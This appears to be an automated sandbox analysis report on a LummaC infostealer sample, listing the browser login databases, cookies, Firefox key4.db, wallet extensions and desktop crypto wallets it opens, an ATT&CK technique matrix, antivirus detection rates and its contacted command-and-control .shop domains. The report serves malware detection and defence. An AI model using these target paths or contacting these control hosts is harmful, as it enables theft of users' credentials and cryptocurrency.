              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: Yara matchFile source: 00000005.00000003.2397981986.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.2389056869.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.2483917008.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2532039828.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.2483286988.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.2531513795.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7060, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7060, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		311
              Process Injection              		1
              Masquerading              		1
              OS Credential Dumping              		111
              Security Software Discovery              		Remote Services1
              Screen Capture              		21
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		11
              Virtualization/Sandbox Evasion              		LSASS Memory11
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Archive Collected Data              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)Logon Script (Windows)311
              Process Injection              		Security Account Manager1
              Process Discovery              		SMB/Windows Admin Shares31
              Data from Local System              		113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Deobfuscate/Decode Files or Information              		NTDS1
              File and Directory Discovery              		Distributed Component Object Model2
              Clipboard Data              		Protocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
              Obfuscated Files or Information              		LSA Secrets12
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe34%ReversingLabsWin64.Dropper.WinGGo
              file.exe38%VirustotalBrowse

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              shatterbreathepsw.shop17%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              tolerateilusidjukl.shop0%Avira URL Cloudsafe
              http://html4/loose.dtd0%Avira URL Cloudsafe
              https://shatterbreathepsw.shop:443/api-release/key4.dbPK0%Avira URL Cloudsafe
              shortsvelventysjo.shop0%Avira URL Cloudsafe
              https://management.azure.comINVALID0%Avira URL Cloudsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://shatterbreathepsw.shop:443/api100%Avira URL Cloudmalware
              https://shatterbreathepsw.shop/w60%Avira URL Cloudsafe
              https://shatterbreathepsw.shop/apii0%Avira URL Cloudsafe
              https://shatterbreathepsw.shop:443/apirosoft0%Avira URL Cloudsafe
              shatterbreathepsw.shop0%Avira URL Cloudsafe
              tolerateilusidjukl.shop14%VirustotalBrowse
              shortsvelventysjo.shop20%VirustotalBrowse
              http://.css0%Avira URL Cloudsafe
              https://shatterbreathepsw.shop/00%Avira URL Cloudsafe
              https://shatterbreathepsw.shop/apiar0%Avira URL Cloudsafe
              https://shatterbreathepsw.shop/apihort0%Avira URL Cloudsafe
              https://shatterbreathepsw.shop:443/api20%VirustotalBrowse
              shatterbreathepsw.shop17%VirustotalBrowse
              demonstationfukewko.shop0%Avira URL Cloudsafe
              productivelookewr.shop0%Avira URL Cloudsafe
              https://shatterbreathepsw.shop/&60%Avira URL Cloudsafe
              https://manage.windowsazure.us/publishsettings/indexMaximum0%Avira URL Cloudsafe
              demonstationfukewko.shop21%VirustotalBrowse
              https://management.chinacloudapi.cntoo0%Avira URL Cloudsafe
              https://shatterbreathepsw.shop/015%VirustotalBrowse
              https://shatterbreathepsw.shop/apiT0%Avira URL Cloudsafe
              http://.jpg0%Avira URL Cloudsafe
              https://www.mozilla.or0%Avira URL Cloudsafe
              alcojoldwograpciw.shop0%Avira URL Cloudsafe
              incredibleextedwj.shop0%Avira URL Cloudsafe
              https://shatterbreathepsw.shop/D70%Avira URL Cloudsafe
              https://manage.windowsazure.us/publishsettings/indexMaximum0%VirustotalBrowse
              https://shatterbreathepsw.shop/apiT16%VirustotalBrowse
              https://shatterbreathepsw.shop/?6a0%Avira URL Cloudsafe
              liabilitynighstjsko.shop0%Avira URL Cloudsafe
              productivelookewr.shop16%VirustotalBrowse
              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
              https://shatterbreathepsw.shop/~60%Avira URL Cloudsafe
              incredibleextedwj.shop14%VirustotalBrowse
              liabilitynighstjsko.shop17%VirustotalBrowse
              https://shatterbreathepsw.shop/y70%Avira URL Cloudsafe
              alcojoldwograpciw.shop21%VirustotalBrowse
              http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
              https://shatterbreathepsw.shop/0%Avira URL Cloudsafe
              https://shatterbreathepsw.shop/apizen0%Avira URL Cloudsafe
              https://protobuf.dev/reference/go/faq#namespace-conflictLZMA0%Avira URL Cloudsafe
              https://shatterbreathepsw.shop/api100%Avira URL Cloudmalware
              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta0%Avira URL Cloudsafe
              https://shatterbreathepsw.shop/1%VirustotalBrowse
              https://manage.chinacloudapi.com/publishsettings/indexhttps://manage.microsoftazure.de/publishsettin0%Avira URL Cloudsafe
              https://shatterbreathepsw.shop/api20%VirustotalBrowse
              https://protobuf.dev/reference/go/faq#namespace-conflictLZMA0%VirustotalBrowse
              https://manage.chinacloudapi.com/publishsettings/indexhttps://manage.microsoftazure.de/publishsettin0%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              shatterbreathepsw.shop
              		104.21.95.19
              		truetrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              shortsvelventysjo.shoptrue
              • 20%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              tolerateilusidjukl.shoptrue
              • 14%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              shatterbreathepsw.shoptrue
              • 17%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              demonstationfukewko.shoptrue
              • 21%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              productivelookewr.shoptrue
              • 16%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              alcojoldwograpciw.shoptrue
              • 21%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              incredibleextedwj.shoptrue
              • 14%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              liabilitynighstjsko.shoptrue
              • 17%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://shatterbreathepsw.shop/apitrue
              • 20%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://management.azure.comINVALIDfile.exefalse
              • Avira URL Cloud: safe
              		unknown
              http://html4/loose.dtdfile.exefalse
              • Avira URL Cloud: safe
              		low
              https://duckduckgo.com/chrome_newtabBitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://shatterbreathepsw.shop:443/api-release/key4.dbPKBitLockerToGo.exe, 00000005.00000003.2531309021.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.2532039828.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2490547443.0000000002F0A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/ac/?q=BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://shatterbreathepsw.shop:443/apiBitLockerToGo.exe, 00000005.00000003.2531309021.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2420113247.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397981986.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2463146392.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2389056869.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.2532039828.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2483801676.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418852252.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2470403875.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2483094012.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2490547443.0000000002F0A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2419343297.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418983675.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 20%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
